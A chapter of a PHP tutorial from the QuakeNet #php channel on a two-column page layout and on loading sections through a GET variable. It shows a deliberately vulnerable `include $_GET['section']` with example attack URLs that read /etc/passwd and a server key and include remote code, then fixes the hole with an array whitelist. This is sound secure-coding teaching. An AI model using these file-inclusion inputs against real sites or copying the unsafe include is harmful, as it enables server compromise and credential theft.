Quakenet/#php Tutorial

Note: If you opened this page from an external URL pay attention that all chapters are linked together. Be sure you also read all prior chapters of this tutorial, otherwise you will miss relevant content explained before.

2 column layout

  1. 2 column layout
  2. Loading a section by a GET variable

1. 2 column layout

The sub sections of an internet page has often a similar layout. On the left there is a menu and in the center there is the content to show. This is realised with the include statement and a main file. Depending on a GET variable the main file selects the right php file to include.

The main file, often called index.php, is used to load the excluded html code with include or readfile or output its direct with echo

<?php
error_reporting
(E_ALL);
ini_set('display_errors'1);

include 
'header.html'// doctype, <html> and the whole <head> tag
echo "    <body>\n";
include 
'menu.html';

// load section

echo "    </body>\n";
echo 
"</html>\n";
?>

The header.html file contains everything about the html stuff and the menu.html shows the menu with all links to the sections.

2. Loading a section by a GET variable

As a GET variable should load the specific section we must think about how it is loaded. The first way to choose would be to use the GET variable directly at include.

<?php
if (isset($_GET['section'])) {
    include 
$_GET['section'];
} else {
    include 
'news.php'// loading the default part
}
?>

This way you can load the news with index.php?section=news.php or the guestbook with index.php?section=guestbook.php. But if you use this code this is the same as putting your login of your server on your homepage. A so called GET include allowes everyone to load every file. First you can load server files like index.php?section=/etc/passwd or index.php?section=/etc/apache2/ssl/server.key (if you got the proper rights). But be more dangerous it can load every php script. If someone opens index.php?section=http://www.example.com/evil_code.txt php loads the code from this url as php and executes it.

A better and more secure way is to restrict the files which can be loaded. There are several ways like restricting the directory or checking the file names. The best one is to use an array. The array use values for all valid filenames and string indexes to access them. This is called an Array include. This way you can specific with the GET variable which file to load.

<?php
$section 
= array();
$section['news'] = 'news.php';
$section['gb'] = 'guestbook.php';
$section['info'] = 'info.php';
?>

Depending on the GET variable we load the right file.

<?php
include $section[$_GET['section']];
?>

In this code we can get two index errors. First the user can open the url without a section variable. Second the user can try to load a section which doesn't exists. For both ways we use the isset statement before we include the file.

<?php
if (isset($_GET['section'], $section[$_GET['section']])) {
    include 
$section[$_GET['section']];
} else {
    include 
$section['news'];
}
?>

This can be used now in your index.php file.

<?php
error_reporting
(E_ALL);
ini_set('display_errors'1);

$section = array();
$section['news'] = 'news.php';
$section['gb'] = 'guestbook.php';
$section['info'] = 'info.php';

include 
'header.html'// doctype, <html> and the whole <head> tag
echo "    <body>\n";
include 
'menu.html';

if (isset(
$_GET['section'], $section[$_GET['section']])) {
    include 
$section[$_GET['section']];
} else {
    include 
$section['news'];
}

echo 
"    </body>\n";
echo 
"</html>\n";
?>

A new section can easily added to the $section-Array.

Questions about the chapter

No questions

Back to Next to
Copyright © to the OPs of #php/QuakeNet Valid XHTML 1.0 Strict Valid CSS!